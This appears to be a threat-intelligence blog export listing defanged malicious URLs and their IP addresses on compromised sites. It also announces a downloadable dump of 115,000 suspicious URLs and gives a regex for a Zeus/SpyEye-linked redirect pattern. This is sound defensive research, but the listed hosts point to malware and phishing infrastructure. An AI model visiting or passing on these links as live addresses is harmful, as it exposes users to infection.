<td height="20" style="height: 15.0pt; width: 239pt;" width="319">hxxp://aanchalfoundation.org/wlc.htm</td>
<td style="width: 48pt;" width="64">173.0.137.215</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://algamish.com/wlc.htm</td>
<td>67.228.38.74</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://alokab.com/wlc.htm</td>
<td>77.232.90.21</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://areawebmaster.seat.it/wlc.htm</td>
<td>212.48.3.234</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://avatar-italia.it/wlc.htm</td>
<td>109.237.160.68</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://banner.terrarium.pl/wlc.htm</td>
<td>87.98.235.213</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://bartinemusicstudio.com/wlc.htm</td>
<td>69.163.133.96</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://beachhamburg.de/wlc.htm</td>
<td>88.198.55.176</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://beatall.net/wlc.htm</td>
<td>67.207.130.151</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://beer-land.ru/wlc.htm</td>
<td>92.53.98.191</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://board.edenservers.fr/wlc.htm</td>
<td>91.236.239.88</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://brlifecs.paradisegamers.com.br/wlc.htm</td>
<td>108.163.190.2</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://ceratofortekoup.sg/wlc.htm</td>
<td>116.12.49.215</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://contentoz.com/wlc.htm</td>
<td>134.0.10.214</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://crimestoppers-uk.org/wlc.htm</td>
<td>84.45.40.244</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://donmt-com.standart.info/wlc.htm</td>
<td>92.53.123.113</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://dontwakethecat.net/wlc.htm</td>
<td>94.23.70.134</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://eens.econz.net/wlc.htm</td>
<td>173.0.137.215</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://e-hydromax.pl/wlc.htm</td>
<td>87.98.235.213</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://elmira.designcon.tmweb.ru/wlc.htm</td>
<td>176.57.216.3</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://fizkult64.ru/wlc.htm</td>
<td>217.112.35.62</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://fondarh.ru/wlc.htm</td>
<td>92.53.96.106</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://fonlider.rs/wlc.htm</td>
<td>212.200.146.137</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://forum.diabetes-zveza.si/wlc.htm</td>
<td>89.142.199.108</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://forum.pilesfissure.in/wlc.htm</td>
<td>173.0.137.215</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://galantvisa.ru/wlc.htm</td>
<td>81.177.6.141</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://geo-top.ru/wlc.htm</td>
<td>78.108.84.160</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://globalcartrading.dk/wlc.htm</td>
<td>213.83.233.51</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://gurupra.com/wlc.htm</td>
<td>122.155.10.238</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://hyundai-tskmotor.ru/wlc.htm</td>
<td>77.221.130.38</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://ismmania.com/wlc.htm</td>
<td>69.163.133.96</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://italtravel-rimini.com/wlc.htm</td>
<td>178.20.153.14</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://itoobras.cl/wlc.htm</td>
<td>69.163.151.29</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://jayhawksbasketball.ca/wlc.htm</td>
<td>173.254.28.67</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://kingpinvideos.com/wlc.htm</td>
<td>66.147.244.169</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://knoxvillejukebox.com/wlc.htm</td>
<td>69.163.133.96</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://krinitskiy.com/wlc.htm</td>
<td>176.57.216.3</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://kroppskultur.com/wlc.htm</td>
<td>195.74.38.119</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://ktakademija.lt/wlc.htm</td>
<td>79.98.28.30</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://l2nightfall.com.br/wlc.htm</td>
<td>187.17.98.166</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://ldengi.ru/wlc.htm</td>
<td>195.24.65.120</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://limavirtual.unicordoba.edu.co/wlc.htm</td>
<td>190.66.23.38</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://lindsaylohan.com.br/wlc.htm</td>
<td>5.39.71.9</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://lt-eg.com/wlc.htm</td>
<td>98.138.19.88</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://meat64.ru/wlc.htm</td>
<td>81.177.139.244</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://miel-baumanskaya.ru/wlc.htm</td>
<td>77.222.40.153</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://my.knoxvillebusiness.com/wlc.htm</td>
<td>69.163.133.96</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://myv.co.il/wlc.htm</td>
<td>82.80.17.43</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://nafa.mexaimoda.ru/wlc.htm</td>
<td>188.120.39.56</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://portjeffersonfishing.com/wlc.htm</td>
<td>69.163.200.199</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://profsiz.ru/wlc.htm</td>
<td>81.222.215.167</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://puma-avto.ru/wlc.htm</td>
<td>195.208.1.100</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://putevkivsem.ru/wlc.htm</td>
<td>217.29.51.172</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://repairmycomputer.in/wlc.htm</td>
<td>108.174.50.150</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://rovere.lu/wlc.htm</td>
<td>80.92.67.155</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://sagafurs.mexaimoda.ru/wlc.htm</td>
<td>188.120.39.56</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://san-tyr.ru/wlc.htm</td>
<td>83.172.33.19</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://schetchik-grand.ru/wlc.htm</td>
<td>92.53.123.113</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://secure.publiquest.net/wlc.htm</td>
<td>23.23.211.79</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://shadownessence.net/wlc.htm</td>
<td>195.74.38.18</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://silkway.webmanager.kz/wlc.htm</td>
<td>212.154.250.254</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://sv-company.ae/wlc.htm</td>
<td>176.57.216.3</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://taleemindia.org/wlc.htm</td>
<td>173.0.137.215</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://test-dm.designcon.tmweb.ru/wlc.htm</td>
<td>176.57.216.3</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://thekla-kampelmann.com/wlc.htm</td>
<td>83.125.114.225</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://theundergrounds.org/wlc.htm</td>
<td>188.93.237.135</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://tickets.econz.net/wlc.htm</td>
<td>173.0.137.215</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://top10.knoxvillebusiness.com/wlc.htm</td>
<td>69.163.133.96</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://trasken.com.br/wlc.htm</td>
<td>187.17.98.166</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://valleyironworksinc.com/wlc.htm</td>
<td>67.205.7.106</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://voltecs.unima.ru/wlc.htm</td>
<td>213.239.214.68</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://web.shu-bg.net/wlc.htm</td>
<td>194.141.47.8</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://wodteam.by/wlc.htm</td>
<td>80.249.84.134</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.bkpschool.ac.th/wlc.htm</td>
<td>119.59.120.12</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.brita-leth.dk/wlc.htm</td>
<td>193.202.110.80</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.caven.cn/wlc.htm</td>
<td>219.133.36.172</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.ccanw.co.uk/wlc.htm</td>
<td>79.170.44.112</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.cfbc.md/wlc.htm</td>
<td>93.116.255.220</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.contentoz.com/wlc.htm</td>
<td>134.0.10.214</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.crimestoppers-uk.org/wlc.htm</td>
<td>84.45.40.244</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.envirobuildings.com/wlc.htm</td>
<td>173.254.3.165</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.filmactingworkshops.com/wlc.htm</td>
<td>67.20.82.242</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.fizkult64.ru/wlc.htm</td>
<td>217.112.35.62</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.fonlider.rs/wlc.htm</td>
<td>212.200.146.137</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.ghostway.it/wlc.htm</td>
<td>46.137.96.65</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.globalcartrading.dk/wlc.htm</td>
<td>213.83.233.51</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.ibraco.org.co/wlc.htm</td>
<td>216.22.48.60</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.irklakojis.lt/wlc.htm</td>
<td>79.98.24.10</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.italianosrestaurant.net/wlc.htm</td>
<td>98.129.229.207</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.itoobras.cl/wlc.htm</td>
<td>69.163.151.29</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.ivcmf.by/wlc.htm</td>
<td>31.130.201.140</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.judiciary.go.ke/wlc.htm</td>
<td>31.222.163.18</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.karaczany.terrarium.pl/wlc.htm</td>
<td>87.98.235.213</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.knoxvillejukebox.com/wlc.htm</td>
<td>69.163.133.96</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.miel-baumanskaya.ru/wlc.htm</td>
<td>77.222.40.153</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.ndcotas.com.au/wlc.htm</td>
<td>69.163.229.122</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.playkrampage.com/wlc.htm</td>
<td>50.56.110.204</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.rascoly.com/wlc.htm</td>
<td>66.147.240.198</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.rovere.lu/wlc.htm</td>
<td>80.92.67.155</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.shadownessence.net/wlc.htm</td>
<td>195.74.38.18</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.suuberquiz.ch/wlc.htm</td>
<td>82.195.253.206</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.telemirspb.ru/wlc.htm</td>
<td>77.222.40.117</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.theundergrounds.org/wlc.htm</td>
<td>188.93.237.135</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.worldfund.org/wlc.htm</td>
<td>98.129.212.7</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://www.xrayinspectionservice.com/wlc.htm</td>
<td>184.106.55.35</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://zeo.designcon.tmweb.ru/wlc.htm</td>
<td>176.57.216.3</td>
</tr>
<tr height="20" style="height: 15.0pt;">
<td height="20" style="height: 15.0pt;">hxxp://zone4.co.id/wlc.htm</td>
<td>103.4.175.114</td>
</tr>
</tbody></table>
<br />
<br />
<b>I've never visited Lithuania.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqF6mhkThSGbt3mizApuLKDfcXLASlAvypiH0Qaqb3KxqOKjSdjQ81-nTQr3mQbY5Z3EqwTAzp_Rt-5A_hrfz0zshQmMp6UKTb2OWN7FWi31sI9eZ9Uyqlm7RVh428femPF6h9HYtyI0c/s1600/latvia.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="406" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqF6mhkThSGbt3mizApuLKDfcXLASlAvypiH0Qaqb3KxqOKjSdjQ81-nTQr3mQbY5Z3EqwTAzp_Rt-5A_hrfz0zshQmMp6UKTb2OWN7FWi31sI9eZ9Uyqlm7RVh428femPF6h9HYtyI0c/s640/latvia.PNG" width="640" /></a></div>
<br />
References:<br />
URLQuery<br />
Cleanmx<br />
Generated intelligenceFort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-68723057470510860312013-01-15T14:01:00.002-08:002013-02-21T16:14:44.359-08:00Data Dump - 115,000 suspicious URLsI recently discovered a published list of suspicious URLs containing over 115,000 links. This list came from a compromised box where the C drive was published online, accidentally.<br />
<br />
The list itself is a nice reference for patterns and use cases, including 7,000+ .exe files, paypal phishing links, pastehtml.com links and all kinds of redirectors. Some of these are valid, some of them are taken down. Some of these are super malicious, some of them are unknown.<br />
<br />
<b>It should be stated that this list was grabbed from a repository of files on a compromised box which was accidentally published online. </b>Not every link is live, but all these links were in a directory referenced by a malware samples of a likely TDS infection.<br />
<br />
I have gone through many of them, but I decided to publish the entire list.<br />
<br />
Sharing is caring.<br />
<br />
<a href="http://www.fortknoxnetworks.com/intel/dumps/urls.zip">FULL URL LIST</a><br />
<br />
<a href="http://www.fortknoxnetworks.com/intel/dump/exes.txt">EXEs ONLY</a><br />
<br />
Screencap of dump file, available at links above.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiytTMflGmyR0J8LZ67GYleyhROaFTwAlHCg9NSX3MSC4ndICrp_zTxVZn9eRdXjJVZWMcSpwo2efQdeaDGatfAEhrCf5KeO9Bq597pWjh3AcNQDtBpWm4LO7OyPIAOBNYUQ07WAWES0Wk/s1600/screencap.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiytTMflGmyR0J8LZ67GYleyhROaFTwAlHCg9NSX3MSC4ndICrp_zTxVZn9eRdXjJVZWMcSpwo2efQdeaDGatfAEhrCf5KeO9Bq597pWjh3AcNQDtBpWm4LO7OyPIAOBNYUQ07WAWES0Wk/s1600/screencap.PNG" /></a></div>
<br />Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-59399530213446811462012-12-30T09:17:00.004-08:002012-12-30T09:17:51.430-08:00Parentesis URL Pattern, Likely Associated with Badness<span style="font-family: inherit;">I ran into an interesting URL pattern containing parenthesis in a specific method. On deeper inspection, it looks like this pattern may be associated with badness, the details of which I am not certain but thought good enough to bring to the community. </span><br />
<br />
<br />
My research on this so far indicates that some of the URLs are associated with known Zeus/Spyeye C2 servers, and a large number of these patterns hosted on legitimate sites whose subdirectories containing these patters are not indexed by Google. Also, it appears this pattern has been active for some time and may have been identified by other researchers, I am not sure.<br />
<br />
Some URLquery patterns show redirects to a domain that was reported in December associated with drive by downloads in an Andriod forum which is no longer operational (at least today).<br />
<br />
The observations at this time are that these are redirects, or contain redirects, to badness which is why I am bringing it to the community.<br />
<br />
<span style="background-color: white; color: #222222; font-size: x-small; line-height: 16px;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTX6WcD1o9pEuqJpAfTtPL_vL0k3ua3hPRrspfmlTAZMx0-5NTsHERDYXOpeulBhMMWXAVOjQuZEsI1hMzdApfyV0BSNBxFdS5TiVJr3e8ikSHajAPwEwVBpC_IZCsgBJ0UQJ5Z5G8QPc/s1600/ritastexas.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTX6WcD1o9pEuqJpAfTtPL_vL0k3ua3hPRrspfmlTAZMx0-5NTsHERDYXOpeulBhMMWXAVOjQuZEsI1hMzdApfyV0BSNBxFdS5TiVJr3e8ikSHajAPwEwVBpC_IZCsgBJ0UQJ5Z5G8QPc/s1600/ritastexas.PNG" /></a></div>
<span style="background-color: white; color: #222222; font-size: x-small; line-height: 16px;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="background-color: white; color: #222222; font-size: x-small; line-height: 16px;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: x-small; line-height: 16px;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEt9slfbCsK87uxVjtFvLGh9tQgbfVm5oqA6dddIh046uurA3vBUzcpVHO7rvX3wshsGKzieBRDGa7LeCGpxAusl1TE97DFXgdGCDUPf3VLIgqt3X_S4sDvjb_daCqUevnGOrrfrHHKiA/s1600/examplesofaspx.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEt9slfbCsK87uxVjtFvLGh9tQgbfVm5oqA6dddIh046uurA3vBUzcpVHO7rvX3wshsGKzieBRDGa7LeCGpxAusl1TE97DFXgdGCDUPf3VLIgqt3X_S4sDvjb_daCqUevnGOrrfrHHKiA/s320/examplesofaspx.PNG" width="320" /></a></div>
<span style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: x-small; line-height: 16px;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEOsXMgptSaDDyF_qw3Q1BrUaUtjhLUXh3g3-stFcqCeFaXVJfttm-mXrnaDVMdIU3e3rfcmec9D4s1cpkEch_NL_cb4Hf4dS1R4sQBDf_Llm30xRfnBmB_A2fgLdN3bz3GlLq_Sz2TNo/s1600/legit+sites.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEOsXMgptSaDDyF_qw3Q1BrUaUtjhLUXh3g3-stFcqCeFaXVJfttm-mXrnaDVMdIU3e3rfcmec9D4s1cpkEch_NL_cb4Hf4dS1R4sQBDf_Llm30xRfnBmB_A2fgLdN3bz3GlLq_Sz2TNo/s320/legit+sites.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
The URL pattern in question is:</div>
<div class="separator" style="clear: both;">
<span style="color: red;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="color: red;"><b>\(s\(\w{24}\)\)?\/\w{2,}\.aspx</b></span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
There is one URLquery report on this type of URL here. On inspection, this report shows a series of get requests including one URL which traces back to a report on undroid.us as containing badness ( hxxp://zirycatum.com/k985ytv.htm). I also noticed the k985ytv.htm more than once.</div>
<div class="separator" style="clear: both;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjivb1u3lj4N6UZBuhNarcd406AZZXAI1yCvWnrTzPxXc9j8Dmi2sbhBdf6Nqabq0IYgFHrmAa4lsWnyjUqA7MN_lgscgc6PBgAbzRSoOmrir0_Z-pYKhx81sxTnqL_1OmLJ5Gr2YreGFI/s1600/aspxredirect.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="478" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjivb1u3lj4N6UZBuhNarcd406AZZXAI1yCvWnrTzPxXc9j8Dmi2sbhBdf6Nqabq0IYgFHrmAa4lsWnyjUqA7MN_lgscgc6PBgAbzRSoOmrir0_Z-pYKhx81sxTnqL_1OmLJ5Gr2YreGFI/s640/aspxredirect.PNG" width="640" /></a></div>
<br />
<br />
<div style="text-align: center;">
And I'm not alone in looking at this, going back a while now.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHtflnqjJwqWnZN9gsEGYJbUQVuxRTwypYlI5jFMZCM-QP4-CjLBNFgvDyp9cMlBz5GcOdHKbE9LuBs0osk_F50B0xTflqX5g1bwu6T1wq56uPhLrIKcLrAEIeWqEBqsgf5R2xSjgtpuI/s1600/k985ytv.htm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHtflnqjJwqWnZN9gsEGYJbUQVuxRTwypYlI5jFMZCM-QP4-CjLBNFgvDyp9cMlBz5GcOdHKbE9LuBs0osk_F50B0xTflqX5g1bwu6T1wq56uPhLrIKcLrAEIeWqEBqsgf5R2xSjgtpuI/s640/k985ytv.htm.png" width="614" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
AVG did recognize the content.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCrvErPPBsVw7KYy9IhcBevFylF-PWG_b9LtGL50mas0i8ZAHn8BXoKlvVhpRGHm2c1KMTNIrVsoYjmm-EJVnA1uN03wuMZeluL-zKPyZ1fykBOi1H9fLRmY06b8S5PhLfBtsTEp1svQE/s1600/htmlframer.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="114" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCrvErPPBsVw7KYy9IhcBevFylF-PWG_b9LtGL50mas0i8ZAHn8BXoKlvVhpRGHm2c1KMTNIrVsoYjmm-EJVnA1uN03wuMZeluL-zKPyZ1fykBOi1H9fLRmY06b8S5PhLfBtsTEp1svQE/s320/htmlframer.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
Jsunpack </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6T2nmRfplS79XVFTLmbzwSAPShvWPobCEHz_tLHrx8P1UduraY8CFYSPOjJjmGMS81HCp2FQ9cB2d27D4CZeuNecTH_f3RrKkeFnXrU_2BtuiJwFD-mvwleN7Az7udmdXzpTZi8IHYF8/s1600/redirect.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="57" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6T2nmRfplS79XVFTLmbzwSAPShvWPobCEHz_tLHrx8P1UduraY8CFYSPOjJjmGMS81HCp2FQ9cB2d27D4CZeuNecTH_f3RrKkeFnXrU_2BtuiJwFD-mvwleN7Az7udmdXzpTZi8IHYF8/s320/redirect.PNG" width="320" /></a></div>
<br />
<br />
<br />
<br />
www.undroid.us/wordpress/?cat=19<br />
Dec 8, 2012 - 2. zirycatum.com (ex: hxxp://zirycatum.com/k985ytv.htm) 3. numudozaf.com (ex: hxxp://numudozaf.com/k985ytv.htm) Above all resolve to the same Moldova (south ...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
